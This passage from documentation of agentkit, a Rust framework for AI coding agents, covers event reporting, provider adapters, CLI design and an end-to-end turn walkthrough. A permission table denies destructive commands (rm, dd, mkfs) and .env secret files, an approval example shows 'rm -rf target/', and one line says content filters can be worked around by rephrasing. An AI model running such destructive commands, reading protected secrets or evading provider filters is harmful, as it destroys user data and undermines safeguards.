With this in place, the agent.turn, chat, agent.execute_tool, and mcp.call_tool spans become OTel spans in your trace backend (Jaeger, Tempo, Honeycomb, Datadog, etc.) with the GenAI semantic-convention fields preserved as span attributes.

Two layers, one filter

The split between internal spans and the reporter exists so the two concerns evolve independently:

Internal spans track what the framework is doing right now — useful for performance investigations, deadlocks, and missing instrumentation. They emit unconditionally when tracing is enabled in your subscriber, with no host-side wiring.
Reporter events track what the agent is reporting back to the host — useful for UX, audit, and product analytics. They only fire when you register a reporter, and they have stable categorical levels for log routing.

A coding-agent CLI typically wants both. A library embedding agentkit may want only the reporter events to keep the framework’s internal noise out of its own logs.

Failure policy

Reporter failures are non-fatal by default. A broken log writer shouldn’t crash the agent. Hosts can configure stricter behavior:

Ignore — swallow errors
Log — log errors to stderr
Accumulate — collect errors for later inspection
FailFast — abort on first error

Writing a custom observer

The trait is simple enough that custom observers are straightforward:

#![allow(unused)]
fn main() {
use std::sync::atomic::{AtomicUsize, Ordering};

struct ToolCallCounter {
    count: AtomicUsize,
}

impl LoopObserver for ToolCallCounter {
    fn handle_event(&self, event: AgentEvent) {
        if matches!(event, AgentEvent::ToolCallRequested(_)) {
            self.count.fetch_add(1, Ordering::Relaxed);
        }
    }
}
}

A more practical example — a reporter that writes tool calls to a structured log:

#![allow(unused)]
fn main() {
use std::sync::Mutex;

struct AuditLogger {
    writer: Mutex<BufWriter<File>>,
}

impl LoopObserver for AuditLogger {
    fn handle_event(&self, event: AgentEvent) {
        let mut writer = self.writer.lock().unwrap();
        match &event {
            AgentEvent::ToolCallRequested(call) => {
                writeln!(writer, "TOOL_CALL: {} input={}", call.name,
                    serde_json::to_string(&call.input).unwrap_or_default()
                ).ok();
            }
            AgentEvent::ApprovalRequired(req) => {
                writeln!(writer, "APPROVAL_REQUIRED: {} reason={:?}",
                    req.summary, req.reason
                ).ok();
            }
            _ => {}
        }
    }
}
}

AgentEvent categories

Category	Events
Lifecycle	`RunStarted`, `TurnStarted`, `TurnFinished`, `RunFailed`
Input	`InputAccepted`
Streaming	`ContentDelta`
Tools	`ToolCallRequested`, `ToolResultReceived`, `ToolCatalogChanged`
Approval	`ApprovalRequired`, `ApprovalResolved`
Mutators	`MutationStarted`, `MutationFinished`
Usage	`UsageUpdated`
Diagnostic	`Warning`

For loss-free transcript reconstruction, register a TranscriptObserver alongside LoopObserver. It fires once per Item appended, in transcript order — including the synthetic placeholder and the eventual real result for background-detached tools, both correlated through the matching ToolResultReceived events by call_id.

Event timeline for a typical turn

RunStarted { session_id }
│
├── InputAccepted { items: [User("Fix the bug")] }
├── TurnStarted { session_id, turn_id: "turn-1" }
│   ├── ContentDelta(BeginPart { kind: Text })
│   ├── ContentDelta(AppendText { chunk: "I'll " })
│   ├── ContentDelta(AppendText { chunk: "read the file." })
│   ├── ContentDelta(CommitPart { part: Text("I'll read the file.") })
│   ├── ToolCallRequested(ToolCallPart { name: "fs_read_file", ... })
│   └── UsageUpdated(Usage { input: 1500, output: 200 })
│
├── TurnStarted { session_id, turn_id: "turn-2" }  ← automatic tool roundtrip
│   ├── ContentDelta(...)                            ← model response after reading file
│   ├── ToolCallRequested(ToolCallPart { name: "fs_replace_in_file", ... })
│   └── UsageUpdated(Usage { ... })
│
└── TurnFinished(TurnResult { finish_reason: Completed, ... })

Example: openrouter-agent-cli uses a composite reporter with stdout and usage reporting.

Crate: agentkit-reporting — depends on agentkit-loop for event types.

Provider adapters

Chapter 1 built an adapter from scratch for a hypothetical non-standard API, then introduced the CompletionsAdapter for OpenAI-compatible providers. This chapter goes deeper on the CompletionsProvider pattern that most real providers use.

Two paths to an adapter

Path 1: Implement ModelAdapter/ModelSession/ModelTurn directly
  └── For non-standard APIs (custom REST, gRPC, WebSocket)
  └── Full control, full responsibility
  └── ~200-500 lines of translation code

Path 2: Implement CompletionsProvider (via agentkit-adapter-completions)
  └── For OpenAI-compatible chat completions APIs
  └── ~50-100 lines: config + hooks
  └── Transcript conversion, tool serialization, streaming, error handling — all handled

Most providers speak the OpenAI chat completions format (or close variants). For these, CompletionsProvider is the right choice. It handles the ~1000 lines of translation that every completions-compatible adapter needs.

agentkit-provider-anthropic takes Path 1. Anthropic’s /v1/messages endpoint has a different shape (top-level system, no tool role, tool results as content blocks inside user messages, x-api-key auth, Anthropic-specific SSE event stream), so it implements ModelAdapter directly.

agentkit-provider-cerebras also takes Path 1, for different reasons. The wire shape is OpenAI-compatible, but the adapter carries surface area that CompletionsProvider does not model: msgpack + gzip request compression (behind a Cargo feature), an X-Cerebras-Version-Patch header that opts into new API majors, typed reasoning config with model-specific validation, strict JSON-Schema output with the documented constraint checks, a rate-limit snapshot surfaced on the adapter, and a Files + Batch API whose request builder is shared with the turn loop. Folding all of that into generic hooks would dilute them, so the crate talks to /v1/chat/completions directly and exposes the preview surfaces through its own types.

The CompletionsProvider trait

#![allow(unused)]
fn main() {
pub trait CompletionsProvider: Send + Sync + Clone {
    type Config: Serialize + Clone + Send + Sync;

    fn provider_name(&self) -> &str;
    fn endpoint_url(&self) -> &str;
    fn config(&self) -> &Self::Config;

    // Hooks — defaults pass through unchanged:
    fn preprocess_request(&self, builder: HttpRequestBuilder) -> HttpRequestBuilder { builder }
    fn apply_prompt_cache(&self, body: &mut Map<String, Value>, request: &TurnRequest) -> Result<(), LoopError> { Ok(()) }
    fn preprocess_response(&self, _status: StatusCode, _body: &str) -> Result<(), LoopError> { Ok(()) }
    fn postprocess_response(&self, _usage: &mut Option<Usage>, _metadata: &mut MetadataMap, _raw: &Value) {}
}
}

The builder is agentkit_http::HttpRequestBuilder — a thin transport abstraction. The default HttpClient is reqwest-backed; alternative clients (reqwest-middleware, or a test double) can be passed via CompletionsAdapter::with_client.

The trait has three required methods (name, URL, config) and four optional hooks. Here’s what each hook is for:

Request lifecycle with hooks:

  TurnRequest
       │
       ▼
  Build JSON body (transcript → messages, tools → tools array)
  Merge Config fields into body
       │
       ├── preprocess_request(builder) ← add auth headers, custom headers
       │
       ├── apply_prompt_cache(body, request) ← map normalized cache requests
       │
       ▼
  HTTP POST to endpoint_url()
       │
       ▼
  Read response
       │
       ├── preprocess_response(status, body) ← check for API errors in 200 responses
       │
       ▼
  Parse into ModelTurnEvents
       │
       ├── postprocess_response(usage, metadata, raw) ← extract provider-specific fields
       │
       ▼
  Return events to loop

What CompletionsAdapter handles

The generic CompletionsAdapter<P> handles all the common work:

Concern	Implementation
`Vec<Item>` → `messages[]`	Maps all `ItemKind` and `Part` variants
`Vec<ToolSpec>` → `tools[]`	Converts name, description, JSON Schema
Multimodal content encoding	Images as `image_url`, audio as `input_audio`
`P::Config` → request body	Serialize and merge fields
SSE stream parsing	Chunk reassembly, delta emission
Tool call accumulation	Collect streaming JSON fragments into complete calls
`finish_reason` → `FinishReason`	Map provider strings to enum variants
`usage` → `Usage`	Map token counts and cost
Cancellation	Race HTTP future against `TurnCancellation`
Error status codes	Convert 4xx/5xx into `LoopError`

The Config associated type

The Config type is where providers differ most. Each provider has different parameter names and supported options:

Provider	max_tokens field	Extra fields
OpenAI	`max_completion_tokens`	`frequency_penalty`, `presence_penalty`
Ollama	`num_predict`	`top_k`
Mistral	`max_tokens`	—
Groq	`max_completion_tokens`	—
vLLM	`max_tokens`	—

By making Config an associated type with Serialize, each provider declares exactly the fields it supports with their correct names. The adapter serializes the struct and merges it into the request body — no field name mapping needed.

Building a provider: the pattern

Every provider crate follows the same structure:

agentkit-provider-{name}/
  src/lib.rs
    ├── {Name}Config         // User-facing config (new, with_temperature, from_env, etc.)
    ├── {Name}RequestConfig  // Serializable request fields (#[serde(skip_serializing_if)])
    ├── {Name}Provider       // CompletionsProvider impl
    └── {Name}Adapter        // Newtype over CompletionsAdapter<{Name}Provider>
                             // Implements ModelAdapter by delegation

The user-facing API:

#![allow(unused)]
fn main() {
let adapter = OllamaAdapter::new(
    OllamaConfig::new("llama3.1:8b")
        .with_temperature(0.0)
        .with_num_predict(4096),
)?;

let agent = Agent::builder()
    .model(adapter)
    .build()?;
}

Available providers

agentkit ships eight provider crates. Six go through CompletionsProvider (Path 2), and two — Anthropic and Cerebras — implement ModelAdapter directly (Path 1):

Crate	Path	Auth	Notes
`agentkit-provider-openrouter`	2 (hooks)	Bearer + headers	auth, cache mapping, 200-with-error handling, cost enrichment
`agentkit-provider-openai`	2 (hooks)	Bearer	auth, cache mapping
`agentkit-provider-anthropic`	1 (direct)	`x-api-key` or Bearer	streaming, extended thinking, server tools, explicit cache-breakpoints, thinking-signature round-trip
`agentkit-provider-cerebras`	1 (direct)	Bearer	streaming, typed reasoning config, strict JSON-Schema output, rate-limit snapshot, version-patch header; feature-gated compression + Batch API
`agentkit-provider-ollama`	2 (hooks)	none	local runtime; no hooks
`agentkit-provider-vllm`	2 (hooks)	optional Bearer	`preprocess_request` for optional auth
`agentkit-provider-groq`	2 (hooks)	Bearer	`preprocess_request` for auth
`agentkit-provider-mistral`	2 (hooks)	Bearer	`preprocess_request` for auth

Ollama is the simplest Path-2 provider — no auth, no hooks. OpenRouter is the most complex Path-2 — auth headers, prompt-cache mapping, 200-with-error handling, response enrichment. Anthropic and Cerebras are the Path-1 providers: read Anthropic if your target API has a non-OpenAI shape, and read Cerebras if it is OpenAI-shaped on the wire but carries enough provider-specific surface — preview parameters, compression, versioning headers, out-of-band endpoints — that modelling it through hooks would be a squeeze.

When to implement ModelAdapter directly

Use the raw traits when:

The provider doesn’t speak the OpenAI chat completions format
The provider uses WebSocket or gRPC instead of HTTP
The provider has server-side session state
You need streaming behavior that SSE doesn’t support

For WebSocket-based providers:

start_session opens the connection
begin_turn sends a continuation frame (not the full transcript)
next_event reads from the live connection
Session cleanup on drop

Testing adapters

Whether you use CompletionsProvider or implement the raw traits, the normalization contract is the same. Test these guarantees:

Text completion → correct Delta sequence ending with CommitPart and Finished
Tool calls → ToolCallPart with valid IDs and parseable JSON input
Multiple tool calls → one ToolCall event per call
Token limit → FinishReason::MaxTokens
Cancellation → clean LoopError::Cancelled
Usage → non-zero, plausible token counts

For CompletionsProvider implementations, you mostly need to test the hooks — the generic adapter handles everything else. Mock the HTTP layer with a test server that returns known SSE responses.

Crate: agentkit-adapter-completions — the generic adapter. agentkit-provider-* — provider-specific implementations.

Architecture of a coding agent

This chapter steps back from individual crates and looks at how they compose into a complete coding agent — the kind of tool you use when you use Claude Code or Codex CLI.

The previous chapters covered each crate in isolation. This chapter shows how they fit together. The goal is not to document every API — that’s what the earlier chapters did. The goal is to show the composition pattern and the trade-offs involved.

What a coding agent needs

A production coding agent requires all of the pieces we’ve covered:

Concern	agentkit crate
Transcript and data model	`agentkit-core`
Capability abstraction	`agentkit-capabilities`
Agent loop and driver	`agentkit-loop`
Tool registry and execution	`agentkit-tools-core`
File read/write/edit	`agentkit-tool-fs`
Shell command execution	`agentkit-tool-shell`
Project context loading	`agentkit-context`
Transcript management	`agentkit-compaction`
Async task scheduling	`agentkit-task-manager`
Event reporting	`agentkit-reporting`
LLM provider adapter	`agentkit-provider-openrouter`

Plus host-specific concerns:

CLI argument parsing and input handling
Terminal rendering and streaming output
Permission policy configuration
Error recovery and retry strategy
Session management

The composition pattern

#![allow(unused)]
fn main() {
// 1. Configure tools
let tools = agentkit_tool_fs::registry()
    .merge(agentkit_tool_shell::registry());

// 2. Configure permissions
let permissions = CompositePermissionChecker::new(PermissionDecision::Deny(default_denial()))
    .with_policy(PathPolicy::new().allow_root(workspace_root))
    .with_policy(CommandPolicy::new().require_approval_for_unknown(true));

// 3. Configure compaction
let compactor = StrategyCompactor::builder()
    .item_count_trigger(20)
    .strategy(
        CompactionPipeline::new()
            .with_strategy(DropReasoningStrategy::new())
            .with_strategy(KeepRecentStrategy::new(12)
                .preserve_kind(ItemKind::System)
                .preserve_kind(ItemKind::Context)),
    )
    .build()?;

// 4. Configure task management
let task_manager = AsyncTaskManager::new().routing(|req: &ToolRequest| {
    if req.tool_name.0 == "shell_exec" {
        RoutingDecision::ForegroundThenDetachAfter(Duration::from_secs(10))
    } else {
        RoutingDecision::Foreground
    }
});

// 5. Configure reporting
let reporter = CompositeReporter::new()
    .with_observer(StdoutReporter::new(std::io::stderr()))
    .with_observer(UsageReporter::new());

// 6. Load context
let context_items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .load()
    .await?;

// 7. Assemble the agent
let agent = Agent::builder()
    .model(OpenRouterAdapter::new(OpenRouterConfig::new(api_key, model))?)
    .add_tool_source(tools)
    .permissions(permissions)
    .compactor(compactor) // AgentBuilderCompactorExt
    .task_manager(task_manager)
    .observer(reporter)
    .build()?;
}

The host loop

The host application drives the interaction. The system prompt and any preloaded context items are handed to AgentBuilder::transcript as the prior transcript; in this turn-based pattern no input is preloaded, so every user message flows through the InputRequest handle exposed on AwaitingInput:

#![allow(unused)]
fn main() {
let mut transcript = Vec::new();
transcript.extend(system_items);
transcript.extend(context_items);

let agent = Agent::builder()
    .model(adapter)
    .transcript(transcript)
    .build()?;

let mut driver = agent.start(session_config).await?;
// With no input preloaded, the first next() yields AwaitingInput — no
// model call is dispatched until the host submits input via the
// InputRequest handle.
let mut pending_input: Option<InputRequest> = None;

loop {
    let req = match pending_input.take() {
        Some(req) => req,
        None => match driver.next().await? {
            LoopStep::Interrupt(LoopInterrupt::AwaitingInput(req)) => req,
            // Drive any non-AwaitingInput step that surfaces before the
            // first user input (rare; handled defensively).
            other => {
                handle_step(other);
                continue;
            }
        },
    };

    let user_input = read_line()?;
    req.submit(&mut driver, vec![user_item(user_input)])?;

    // Run the agent turn
    loop {
        match driver.next().await? {
            LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
                let decision = prompt_user_approval(&pending.request)?;
                driver.resolve_approval(decision)?;
            }
            // Cooperative yield between tool rounds. A headless coding
            // agent just resumes; an interactive host can `info.submit(...)`
            // here to interject a user message before the next model call.
            LoopStep::Interrupt(LoopInterrupt::AfterToolResult(_)) => continue,
            LoopStep::Interrupt(LoopInterrupt::AwaitingInput(req)) => {
                pending_input = Some(req);
                break;
            }
            LoopStep::Finished(result) => {
                print_usage(&result);
                break;
            }
        }
    }

    if pending_input.is_none() {
        break;
    }
}
}

MCP-tool auth challenges surface as ToolError::AuthRequired(_) rather than a loop interrupt — handle them on the manager via manager.resolve_auth(...) (see Chapter 17).

Crate dependency graph

agentkit-core                    (no dependencies)
     │
     ├── agentkit-capabilities
     │        │
     │        ├── agentkit-tools-core
     │        │        │
     │        │        ├── agentkit-tool-fs
     │        │        ├── agentkit-tool-shell
     │        │        └── agentkit-tool-skills
     │        │
     │        └── agentkit-mcp
     │
     ├── agentkit-compaction
     │
     ├── agentkit-context
     │
     ├── agentkit-task-manager
     │
     ├── agentkit-reporting
     │
     ├── agentkit-adapter-completions
     │        │
     │        ├── agentkit-provider-openrouter
     │        ├── agentkit-provider-openai
     │        ├── agentkit-provider-ollama
     │        ├── agentkit-provider-vllm
     │        ├── agentkit-provider-groq
     │        └── agentkit-provider-mistral
     │
     └── agentkit-loop          (coordinates everything)
              │
              └── agentkit      (re-exports for convenience)

Every crate depends on agentkit-core. The loop crate depends on tools, compaction, and task management. Provider crates depend on the completions adapter. Everything else is a leaf.

Design trade-offs

Sequential vs parallel tool execution

The default SimpleTaskManager is sequential. For a coding agent, this is often fine — file operations are fast and order matters. Shell commands are the exception: builds and tests can take seconds or minutes. ForegroundThenDetachAfter gives you the best of both worlds.

Tool type	Recommended routing	Why
Filesystem tools	`Foreground`	Fast, order-sensitive
Shell tools	`ForegroundThenDetachAfter(5-10s)`	May be fast or slow
MCP tools	`Foreground`	Usually fast

Compaction strategy

Aggressive compaction loses context. Conservative compaction hits the context window. The right balance depends on the model’s context size and the nature of the work.

Recommended starting point:

  Trigger: 20 items
  Pipeline:
    1. DropReasoningStrategy         (reasoning blocks are verbose, rarely needed later)
    2. DropFailedToolResultsStrategy (failed tool results add noise)
    3. KeepRecentStrategy(12)        (keep last 12 non-preserved items)
       .preserve_kind(System)        (system prompt is always needed)
       .preserve_kind(Context)       (project context is always needed)

For coding agents, keeping recent tool interactions is usually more valuable than keeping old conversation text — the model needs to know what it just read and edited, not what the user said 20 turns ago.

Permission posture

Default-deny is safest but requires more approval prompts. Default-allow with denylists is more fluid but riskier. Most coding agents land in the middle:

Scope	Decision
Filesystem reads	`Allow` within workspace
Filesystem writes	`Allow` within workspace (with read-before-write)
Filesystem outside	`RequireApproval`
Protected files (`.env`)	`Deny`
Shell (known safe)	`Allow` (`git`, `cargo`, `npm`, `ls`, etc.)
Shell (unknown)	`RequireApproval`
Shell (dangerous)	`Deny` (`rm`, `dd`, `mkfs`)
MCP (trusted)	`Allow`
MCP (unknown)	`RequireApproval`
Fallback	`Deny`

What the host owns

agentkit handles the loop, tools, permissions, and streaming. The host application owns everything else:

Input/output — how users type messages and see results
Session lifecycle — when sessions start, end, and resume
Error recovery — what to do when the model fails or rate-limits
Configuration — which model, which tools, which policies
Persistence — saving transcripts, session state, usage logs

The boundary is intentional: agentkit is a library, not a framework. The host is in control.

Example: openrouter-agent-cli is the closest existing example to a full coding agent — it combines context, tools, shell, MCP, compaction, and reporting.

The interactive CLI

This chapter covers the host-side implementation of an interactive coding agent CLI: architecture, input handling, output rendering, approval UX, session lifecycle, and error recovery.

Everything in this chapter is host code — agentkit doesn’t include a CLI. The library provides the loop, and the host provides the user interface. This separation means the same agentkit crates power a terminal CLI, a web server, an IDE plugin, or a headless CI agent.

Architecture: actor + command channel

An interactive CLI has two responsibilities that pull in different directions:

Driving the loop — owning the single &mut LoopDriver, processing LoopSteps, holding in-flight transcript state.
Owning the terminal — reading stdin, rendering streaming output, switching between message-input and approval-input modes.

A single-task design solves this with tokio::select! over driver.next() and a stdin reader, plus local buffering for messages typed mid-turn. That works, but it tangles “when is the driver at rest?” with “when should I render a prompt?”. The production pattern for non-trivial CLIs is to split the two concerns into separate tasks communicating via typed channels:

  ┌──────────────┐   AgentCommand    ┌───────────────────┐
  │   UI task    │ ────────────────▶ │   Agent task      │
  │ (stdin/TTY)  │                   │ (owns LoopDriver) │
  │              │ ◀──────────────── │                   │
  └──────────────┘     UiEvent       └───────────────────┘

Agent task owns the LoopDriver. Runs a Mode::Idle / Driving / AwaitingApproval state machine driven by incoming AgentCommands and outgoing LoopSteps. Knows nothing about terminal rendering.
UI task owns stdin and stdout. Holds a local UiMode::{MessageInput, ApprovalInput} that determines how each typed line is classified. Knows nothing about the driver.
Observers run inside the agent task. A ChannelObserver forwards every AgentEvent to the UI as a UiEvent::Agent(event); the UI renders from that stream.

Two typed channels:

#![allow(unused)]
fn main() {
// UI → agent.  The UI decides what a raw stdin line means based on its
// local UiMode; the agent never inspects raw strings.
enum AgentCommand {
    UserMessage(String),
    ApprovalAnswer(ApprovalDecision),
    Cancel,
    Quit,
}

// agent → UI.  Carries forwarded AgentEvents plus explicit transitions
// that tell the UI when to change mode or render the prompt.
enum UiEvent {
    Agent(AgentEvent),
    ApprovalRequested(ApprovalRequest),  // UI switches to ApprovalInput
    Idle,                                // UI renders prompt, switches to MessageInput
    Busy,                                // UI shows `⎿ queued` on mid-turn typing
    Shutdown,
}
}

Why this shape:

The &mut LoopDriver invariant stays intact. Every driver mutation happens inside the agent task. The UI task cannot accidentally submit input while next() is awaiting.
The approval race disappears. With one string channel both typed-ahead user messages and approval answers arrive as AgentCommand, and a heuristic must decide which is which. With two typed variants and a UI-owned UiMode, the UI classifies at the source — no race.
The front-end is pluggable. Swap the UI task for an HTTP handler, a test harness, or a GUI without touching the agent code.
State transitions read top-to-bottom. The agent task is a self-contained loop { mode = match mode { … } } state machine.

The openrouter-coding-agent example implements this pattern end-to-end.

The agent-task state machine

#![allow(unused)]
fn main() {
enum Mode {
    Idle { input: InputRequest },
    Driving { buffered: Vec<Item> },
    AwaitingApproval { pending: PendingApproval, buffered: Vec<Item> },
}

// The agent was built with `.transcript(system + context)` and
// `.input(first_user_message)`, so the first `next()` dispatches the
// model directly. After the opening turn, subsequent user messages flow
// through the `InputRequest`/`ToolRoundInfo` handles below.

loop {
    mode = match mode {
        Mode::Idle { input } => {
            evt_tx.send(UiEvent::Idle).ok();
            match cmd_rx.recv().await {
                Some(AgentCommand::UserMessage(text)) => {
                    input.submit(&mut driver, vec![Item::text(ItemKind::User, text)])?;
                    evt_tx.send(UiEvent::Busy).ok();
                    Mode::Driving { buffered: Vec::new() }
                }
                Some(AgentCommand::Quit) | None => break,
                _ => Mode::Idle { input },  // stray commands at rest: drop
            }
        }

        Mode::Driving { mut buffered } => tokio::select! {
            step = driver.next() => match step? {
                LoopStep::Interrupt(LoopInterrupt::AfterToolResult(info)) => {
                    // Flush typed-ahead messages so the next model call sees them.
                    if !buffered.is_empty() {
                        info.submit(&mut driver, std::mem::take(&mut buffered))?;
                    }
                    Mode::Driving { buffered }
                }
                LoopStep::Finished(_) => Mode::Driving { buffered },
                LoopStep::Interrupt(LoopInterrupt::AwaitingInput(req)) => {
                    if !buffered.is_empty() {
                        req.submit(&mut driver, std::mem::take(&mut buffered))?;
                        Mode::Driving { buffered }  // auto-advance
                    } else {
                        Mode::Idle { input: req }
                    }
                }
                LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
                    evt_tx.send(UiEvent::ApprovalRequested(pending.request.clone())).ok();
                    Mode::AwaitingApproval { pending, buffered }
                }
            },
            Some(cmd) = cmd_rx.recv() => match cmd {
                AgentCommand::UserMessage(text) => {
                    buffered.push(Item::text(ItemKind::User, text));
                    Mode::Driving { buffered }
                }
                AgentCommand::Cancel => {
                    cancellation.interrupt();
                    Mode::Driving { buffered }
                }
                AgentCommand::Quit | _ => { /* cancel + drain + break */ }
            },
        },

        Mode::AwaitingApproval { pending, mut buffered } =>
            match cmd_rx.recv().await {
                Some(AgentCommand::ApprovalAnswer(decision)) => {
                    apply_approval(pending, decision, &mut driver)?;
                    Mode::Driving { buffered }
                }
                Some(AgentCommand::UserMessage(text)) => {
                    // User typed a message during the approval — preserve it.
                    buffered.push(Item::text(ItemKind::User, text));
                    Mode::AwaitingApproval { pending, buffered }
                }
                Some(AgentCommand::Cancel) => {
                    pending.deny_with_reason(&mut driver, "cancelled")?;
                    cancellation.interrupt();
                    Mode::Driving { buffered }
                }
                _ => break,
            },
    };
}
}

InputRequest and ToolRoundInfo both consume themselves on submit, so the typed handle in scope at each yield point is the only way to push input — there is no alternative entry point that could race with next().

The three modes correspond to the three reasons a host might be waiting: waiting for the user to speak, waiting for the driver to finish work, waiting for the user to answer an approval.

The UI-task classifier

#![allow(unused)]
fn main() {
enum UiMode { MessageInput, ApprovalInput }

fn classify_line(line: &str, mode: UiMode) -> Option<AgentCommand> {
    let trimmed = line.trim();
    if trimmed.is_empty() { return None; }
    match trimmed {
        "/exit" | "/quit" => return Some(AgentCommand::Quit),
        "/cancel"         => return Some(AgentCommand::Cancel),
        _ => {}
    }
    match mode {
        UiMode::MessageInput  => Some(AgentCommand::UserMessage(line.to_string())),
        UiMode::ApprovalInput => Some(AgentCommand::ApprovalAnswer(parse_answer(trimmed))),
    }
}
}

The UI flips to ApprovalInput on UiEvent::ApprovalRequested and back to MessageInput when it sends an ApprovalAnswer (or on the next UiEvent::Idle). Slash commands are mode-independent. The Busy event tracks whether a ⎿ queued echo should accompany a UserMessage — useful so typed-ahead messages visibly reach the classifier even when streaming output is interleaving with them on the terminal.

Minimal skeleton

For simple CLIs or prototypes, a single-task skeleton with cooperative-yield passthrough is still fine. Preload the system prompt and the user input on the builder so the first next() dispatches the model directly:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .transcript(vec![system_item])
    .input(vec![user_item(&input)])
    .build()?;

let mut driver = agent.start(session_config).await?;

loop {
    match driver.next().await? {
        LoopStep::Finished(_) => break,
        LoopStep::Interrupt(LoopInterrupt::AwaitingInput(_)) => break,
        LoopStep::Interrupt(LoopInterrupt::AfterToolResult(_)) => continue,
        LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(p)) => handle_approval(p, &mut driver)?,
    }
}
}

This is what the one-shot CLIs in the repo (openrouter-chat, openrouter-agent-cli) use. The actor split is worth adopting when a CLI grows mid-turn interjection, rich approval UX, or a pluggable front-end.

Input handling

A coding agent CLI needs to handle:

Single-line user messages
Multi-line input (pasted code, heredocs)
Special commands (exit, help, clear)
Ctrl-C for turn cancellation (not process exit)

Cancellation wiring

Wire Ctrl-C to the CancellationController, not to process exit:

#![allow(unused)]
fn main() {
let controller = CancellationController::new();
let handle = controller.handle();

ctrlc::set_handler(move || {
    controller.interrupt();
})?;
}

The first Ctrl-C cancels the current turn. The model sees FinishReason::Cancelled and the turn ends cleanly. The second Ctrl-C (if nothing is running) exits the process.

Output rendering

Streaming text

The StdoutReporter renders ContentDelta events as they arrive. For a CLI, this means writing each text chunk to stdout immediately:

#![allow(unused)]
fn main() {
fn handle_event(&self, event: AgentEvent) {
    if let AgentEvent::ContentDelta(Delta::AppendText { chunk, .. }) = event {
        print!("{}", chunk);
        std::io::stdout().flush().ok();
    }
}
}

Tool activity

Display tool calls as they happen so the user knows what the agent is doing:

→ fs_read_file(path: "src/main.rs")
→ fs_replace_in_file(path: "src/main.rs", ...)
→ shell_exec(executable: "cargo", argv: ["build"])

Usage reporting

At the end of each turn, display token counts and cost:

tokens: 1,234 in / 567 out | cost: $0.02

Approval UX

When the loop returns an approval interrupt, present it clearly:

⚠ shell_exec wants to run: rm -rf target/
  Allow? [y/n/always]:

Consider supporting:

y — approve once
n — deny
always — approve and add to allowlist for this session

The approval response maps to ApprovalDecision::Approve or ApprovalDecision::Deny.

Session lifecycle

Multi-turn sessions

A coding agent session typically spans many user turns. The driver persists across turns — the transcript accumulates, compaction fires as needed, and the model retains context from earlier in the conversation.

Graceful shutdown

On exit, flush any buffered reporters, print a final usage summary, and clean up resources. If MCP servers are connected, shut them down cleanly.

Error recovery

Model errors

If the model returns an error (rate limit, content filter, network failure), the driver returns Err(LoopError::...). Display the error and let the user decide:

#![allow(unused)]
fn main() {
match driver.next().await {
    Ok(step) => handle_step(step),
    Err(LoopError::Provider(msg)) => {
        eprintln!("Model error: {msg}");
        eprintln!("Press Enter to retry, or type a new message:");
        // Don't exit — the session is still valid
    }
    Err(LoopError::Cancelled) => {
        eprintln!("Turn cancelled.");
        // Session is still valid, user can send another message
    }
    Err(e) => {
        eprintln!("Fatal error: {e}");
        break;  // Only exit on truly unrecoverable errors
    }
}
}

The key insight: most errors are recoverable. A rate limit resolves after waiting. A content filter can be worked around by rephrasing. A network timeout may succeed on retry. Only exit the session on errors that genuinely corrupt the driver state.

Tool errors

Tool failures are returned to the model as a ToolResultPart with is_error: true. The model sees the error message and can decide to retry, try a different approach, or report the failure. The CLI doesn’t need to handle tool errors specially — they’re part of the normal conversation flow.

Tool error flow (handled entirely within the loop):

  Model: ToolCall(fs_read_file, { path: "main.rs" })
  Tool:  ToolResultPart { is_error: true, output: "File not found" }
  Model: "The file doesn't exist in the current directory. Let me check..."
  Model: ToolCall(shell_exec, { executable: "find", argv: [".", "-name", "main.rs"] })
  Tool:  ToolResultPart { output: "./src/main.rs" }
  Model: ToolCall(fs_read_file, { path: "./src/main.rs" })
  Tool:  ToolResultPart { output: "fn main() { ... }" }

  The host never saw the error — the model handled it autonomously.

Design checklist

A production interactive CLI should handle all of these:

Ctrl-C cancels the current turn, not the process
Second Ctrl-C (when no turn is running) exits cleanly
Streaming text renders as it arrives
Tool calls are displayed with name and key arguments
Approval prompts clearly show what’s being requested
Usage is displayed after each turn
Model errors are displayed and the session continues
Graceful shutdown flushes reporters and disconnects MCP
Multi-line input is supported for pasting code

Example: openrouter-agent-cli implements most of these patterns. The remaining work for a production CLI is polish: better terminal rendering, richer approval UX, and configuration management.

Putting it all together

This final chapter traces the complete path of a user request through the system, from keystroke to completed turn, touching every layer we’ve covered.

This is the payoff chapter. Every type, trait, and design decision from the previous 22 chapters appears here in context. If something below is unfamiliar, the cross-reference tells you where to look.

The scenario

A user types: “Add error handling to the parse function in src/parser.rs”

The agent is configured with filesystem tools, shell tools, a PathPolicy for the workspace, a CommandPolicy with cargo in the allowlist, ForegroundThenDetachAfter(10s) for shell commands, a KeepRecentStrategy compaction pipeline, and a CompositeReporter writing to stdout and a usage tracker.

What happens

1. Input submission

The CLI reads the user’s message. The system prompt and any context items were preloaded via AgentBuilder::transcript; the very first user turn was preloaded via AgentBuilder::input so the opening next() dispatches the model directly. Subsequent user messages flow through the InputRequest handle the driver yields on each AwaitingInput interrupt:

#![allow(unused)]
fn main() {
input_request.submit(&mut driver, vec![Item::text(ItemKind::User, user_input)])?;
}

2. Compaction check

The driver checks the compaction trigger. If the transcript exceeds the configured threshold, the compaction pipeline runs — dropping old reasoning blocks, trimming failed tool results, keeping recent items.

3. Turn construction

The driver builds a TurnRequest containing:

The working transcript (system prompt, context items, conversation history)
Tool specs from the registry (fs_read_file, fs_write_file, fs_replace_in_file, shell_exec, etc.)
The normalized prompt cache request for the turn

4. Model invocation

The adapter serializes the request and sends it to the provider. The response streams back as SSE chunks.

5. First tool call — read the file

The model decides it needs to see the file first. It emits a ToolCallPart:

{ "name": "fs_read_file", "input": { "path": "src/parser.rs" } }

The driver:

Looks up fs_read_file in the registry
Evaluates the FileSystemPermissionRequest::Read against the permission checker
The PathPolicy allows reads under the workspace root → Allow
Executes the tool
FileSystemToolResources records that src/parser.rs has been read
Appends the ToolResultPart to the transcript

6. Automatic roundtrip

The driver starts another model turn with the updated transcript. The model now has the file contents.

7. Second tool call — edit the file

The model emits a fs_replace_in_file call with the old and new text.

The driver:

Evaluates FileSystemPermissionRequest::Edit for src/parser.rs
Checks read-before-write policy → the file was read in step 5 → Allow
Executes the replacement
Appends the result

8. Third tool call — verify the change

The model runs shell_exec with cargo check:

The driver:

